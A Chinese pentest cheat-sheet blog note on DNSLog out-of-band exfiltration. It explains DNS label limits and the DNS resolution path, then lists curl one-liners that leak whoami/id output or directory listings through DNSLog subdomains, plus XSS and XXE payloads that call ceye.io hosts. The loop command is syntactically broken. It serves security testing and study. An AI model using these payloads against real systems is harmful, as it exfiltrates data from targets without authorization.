网安-DNSlog

目录

DNSLog解决无回显

DNSLog利用限制

DNS解析流程

Windows环境变量大全

Linux下DNSLog利用

dns平台

XSS

XXE

SSRF


DNSLog解决无回显

带外攻击(OOB=Out of Bind)

DNSLog利用限制

1.域名层级:一般不超过5级

2.每级域名最大长度:63个ASCII字符

3.总域名长度:253个ASCII字符

4.内容限制:数字、字母、下划线

5.适用漏洞:RCE、XXE、SSRF、SQL注入、JNDI注入、反序列化等

DNS解析流程

1.hosts文件(C:\Windows\System32\drivers\etc\hosts)

2.DNS缓存(ipconfig /displaydns)

3.本地DNS服务器(路由器自身,转发给上层)

4.根DNS服务器(Root Server),13组集群服务器

5.顶级域名DNS服务器(Top Level Domain Server),如.com、.cn、.org等

6.Name Server域名服务器的地址(域名服务商提供)

Windows环境变量大全

Windows系统环境变量大全 - edolf - 博客园

Linux下DNSLog利用

获取变量值:
curl http://`whoami`.xxxxxx.dnslog.cn/
base64编码输出:
curl http://$(id|base64).xxxxxx.dnslog.cn/
循环获取文件输出:
for i in (ls/);do curl "http://i.xxxxxx.dnslog.cn/";done;

dns平台

登录 - DNSlog System
登录
DNSLog Platform
CEYE - Monitor service for security testing

1.常用payloads
2.在线查询记录(HTTP/DNS),可下载
3.提供在线API,各种编程语言可调用
4.DNS Rebinding Server
DNS Rebinding Bypass SSRF-先知社区

XSS

<script src = haha.z6iktj.ceye.io></script>

dnslog反应

XXE

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root \%remote;>

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

<!ENTITY % remote SYSTEM "http://hahaha.z6iktj.ceye.io">

%remote;]>

<root/>

SSRF

相关推荐
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
憧憬成为web高手14 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub14 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
爱网络爱Linux14 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc14 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing14 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
Chengbei1114 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
X7x514 天前
深度拆解网络安全“闭环”之王——APPDRR模型
网络安全·网络攻击模型·安全威胁分析·安全架构·appdrr模型
Inhand陈工14 天前
污水泵站PLC数据上云实战:西门子PLC + 映翰通IG502 + DM平台全流程
人工智能·物联网·网络安全·阿里云·信息与通信·iot
X7x514 天前
一文讲透PADIMEE模型
网络安全·网络攻击模型·安全威胁分析·安全架构·padimee模型